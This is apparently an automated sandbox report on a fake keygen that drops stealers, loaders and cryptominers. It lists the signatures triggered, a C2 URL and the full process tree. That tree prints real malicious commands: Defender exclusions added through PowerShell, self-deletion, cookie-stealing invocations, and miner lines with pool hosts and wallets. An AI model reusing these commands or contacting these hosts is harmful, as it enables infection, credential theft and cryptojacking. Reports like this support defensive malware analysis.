Analysis
-
max time kernel
60s -
max time network
299s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 08:55
General
-
Target
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
-
Size
5.2MB
-
MD5
d6b33a9f8b1600caa8b7ac88240e59e1
-
SHA1
19007187f24b11f922ed5ad8717c9e06f6452654
-
SHA256
3ee83cca83729705feabd39c7fd07a9f9f9de6a1847eea6f7ac645a60a643f85
-
SHA512
b8df0dbe55c0ed32639bab7af0a38077338b36fb4e4832d49e542cac9838f6359d3d0764cba4fcaa90ebb486e27efa8a461fe0fe637a94d0fa626a63847fcc04
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 37 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 21 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
themida 1 IoCs
Detects Themida, Advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks for any installed AV software in registry 1 TTPs 53 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SetWindowsHookEx 21 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe" 1 3.1616748980.605da1b4a0f12 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O4XHX1L3N1\multitimer.exe" 2 3.1616748980.605da1b4a0f127⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\mlk5glgy3pi\4yjjh4vznib.exe"C:\Users\Admin\AppData\Local\Temp\mlk5glgy3pi\4yjjh4vznib.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-H1TOE.tmp\4yjjh4vznib.tmp"C:\Users\Admin\AppData\Local\Temp\is-H1TOE.tmp\4yjjh4vznib.tmp" /SL5="$10302,2592217,780800,C:\Users\Admin\AppData\Local\Temp\mlk5glgy3pi\4yjjh4vznib.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KFOBP.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-KFOBP.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 81611⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0trjnhd5ac4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\0trjnhd5ac4\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7MJD9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-7MJD9.tmp\Setup3310.tmp" /SL5="$B02EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\0trjnhd5ac4\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-289SI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-289SI.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
-
C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CJFMP.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-CJFMP.tmp\LabPicV3.tmp" /SL5="$203AE,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EVANL.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-EVANL.tmp\ppppppfy.exe" /S /UID=lab21413⤵
-
C:\Program Files\Windows Portable Devices\SLPQSWWXQX\prolab.exe"C:\Program Files\Windows Portable Devices\SLPQSWWXQX\prolab.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-COE0G.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-COE0G.tmp\prolab.tmp" /SL5="$204EA,575243,216576,C:\Program Files\Windows Portable Devices\SLPQSWWXQX\prolab.exe" /VERYSILENT15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\c2-0c863-eac-ef19a-25a9945a469b8\Kidosaseba.exe"C:\Users\Admin\AppData\Local\Temp\c2-0c863-eac-ef19a-25a9945a469b8\Kidosaseba.exe"14⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1f-318e4-c45-723b9-aef7a4cd33e07\Wesatidoji.exe"C:\Users\Admin\AppData\Local\Temp\1f-318e4-c45-723b9-aef7a4cd33e07\Wesatidoji.exe"14⤵
-
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"11⤵
-
-
C:\Program Files (x86)\VR\Versium Research\RunWW.exe"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f13⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\customer5.exe"C:\Program Files (x86)\VR\Versium Research\customer5.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox13⤵
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"C:\Program Files (x86)\VR\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"11⤵
-
C:\Users\Admin\Documents\dpM0PLybHThhqLFMXHCbWN7e.exe"C:\Users\Admin\Documents\dpM0PLybHThhqLFMXHCbWN7e.exe"12⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5936 -s 150413⤵
- Program crash
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\lylal220.exe"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2M0KD.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-2M0KD.tmp\lylal220.tmp" /SL5="$203DA,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NP4Q2.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-NP4Q2.tmp\Microsoft.exe" /S /UID=lylal22013⤵
-
C:\Program Files\Windows Photo Viewer\QWOWFDXWYO\irecord.exe"C:\Program Files\Windows Photo Viewer\QWOWFDXWYO\irecord.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-COE0F.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-COE0F.tmp\irecord.tmp" /SL5="$204CC,6265333,408064,C:\Program Files\Windows Photo Viewer\QWOWFDXWYO\irecord.exe" /VERYSILENT15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\25-02fb5-17d-f6fb7-b666a9261683f\Jibizhovuwe.exe"C:\Users\Admin\AppData\Local\Temp\25-02fb5-17d-f6fb7-b666a9261683f\Jibizhovuwe.exe"14⤵
-
-
C:\Users\Admin\AppData\Local\Temp\b9-e4100-f36-6b197-cc568c2eae34f\Popynyshali.exe"C:\Users\Admin\AppData\Local\Temp\b9-e4100-f36-6b197-cc568c2eae34f\Popynyshali.exe"14⤵
-
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\YiXjaRalM3qf.exe"C:\Program Files (x86)\VR\Versium Research\YiXjaRalM3qf.exe"11⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵
-
-
-
C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"11⤵
-
C:\ProgramData\925725.exe"C:\ProgramData\925725.exe"12⤵
-
-
C:\ProgramData\6880139.exe"C:\ProgramData\6880139.exe"12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0cwcej1zcqi\vict.exe"C:\Users\Admin\AppData\Local\Temp\0cwcej1zcqi\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-34FLK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-34FLK.tmp\vict.tmp" /SL5="$10314,870426,780800,C:\Users\Admin\AppData\Local\Temp\0cwcej1zcqi\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-44MOV.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-44MOV.tmp\winhost.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xh41zka1vty\vpn.exe"C:\Users\Admin\AppData\Local\Temp\xh41zka1vty\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-JQ650.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQ650.tmp\vpn.tmp" /SL5="$40356,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xh41zka1vty\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iziydfpuuhp\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\iziydfpuuhp\AwesomePoolU1.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\zxi4kbctvrt\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\zxi4kbctvrt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-59CSU.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-59CSU.tmp\IBInstaller_97039.tmp" /SL5="$104A8,9918015,721408,C:\Users\Admin\AppData\Local\Temp\zxi4kbctvrt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-FC606.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-FC606.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-FC606.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4avy5ueb2gz\1vnf4f2q0j2.exe"C:\Users\Admin\AppData\Local\Temp\4avy5ueb2gz\1vnf4f2q0j2.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4avy5ueb2gz\1vnf4f2q0j2.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4avy5ueb2gz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616493487 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\nmfbuqthaq4\l5zwp1igjaj.exe"C:\Users\Admin\AppData\Local\Temp\nmfbuqthaq4\l5zwp1igjaj.exe" /1-6108⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Throbbing-Butterfly'9⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Throbbing-Butterfly\7za.exe"C:\Program Files (x86)\Throbbing-Butterfly\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
-
C:\Program Files (x86)\Throbbing-Butterfly\l5zwp1igjaj.exe"C:\Program Files (x86)\Throbbing-Butterfly\l5zwp1igjaj.exe" /1-6109⤵
-
C:\Program Files (x86)\Throbbing-Butterfly\l5zwp1igjaj.exe"C:\Program Files (x86)\Throbbing-Butterfly\l5zwp1igjaj.exe" /1-61010⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bc5xqrkof0r\dgve1uw2iu0.exe"C:\Users\Admin\AppData\Local\Temp\bc5xqrkof0r\dgve1uw2iu0.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dgve1uw2iu0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bc5xqrkof0r\dgve1uw2iu0.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dgve1uw2iu0.exe" /f10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vjvp5mqjtpm\app.exe"C:\Users\Admin\AppData\Local\Temp\vjvp5mqjtpm\app.exe" /8-238⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Morning-Sound'9⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Morning-Sound\7za.exe"C:\Program Files (x86)\Morning-Sound\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
-
C:\Program Files (x86)\Morning-Sound\app.exe"C:\Program Files (x86)\Morning-Sound\app.exe" /8-239⤵
-
C:\Program Files (x86)\Morning-Sound\app.exe"C:\Program Files (x86)\Morning-Sound\app.exe" /8-2310⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\07V2GIT7S0\setups.exe"C:\Users\Admin\AppData\Local\Temp\07V2GIT7S0\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-B62JB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-B62JB.tmp\setups.tmp" /SL5="$80072,383902,148480,C:\Users\Admin\AppData\Local\Temp\07V2GIT7S0\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\D324.tmp.exe"C:\Users\Admin\AppData\Roaming\D324.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\D324.tmp.exe"C:\Users\Admin\AppData\Roaming\D324.tmp.exe"6⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\D3E1.tmp.exe"C:\Users\Admin\AppData\Roaming\D3E1.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\235266.exe"C:\ProgramData\235266.exe"5⤵
-
-
C:\ProgramData\1677330.exe"C:\ProgramData\1677330.exe"5⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
-
-
-
C:\ProgramData\4375295.exe"C:\ProgramData\4375295.exe"5⤵
-
-
C:\ProgramData\7543344.exe"C:\ProgramData\7543344.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d87c729c20864d39b4ae59115f472ac1 /t 4448 /p 44041⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C8A4B2DB58774F3566A238A8849BBA10 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 214D623C8C5DC6E3651CBA836746AB7D2⤵
-
-
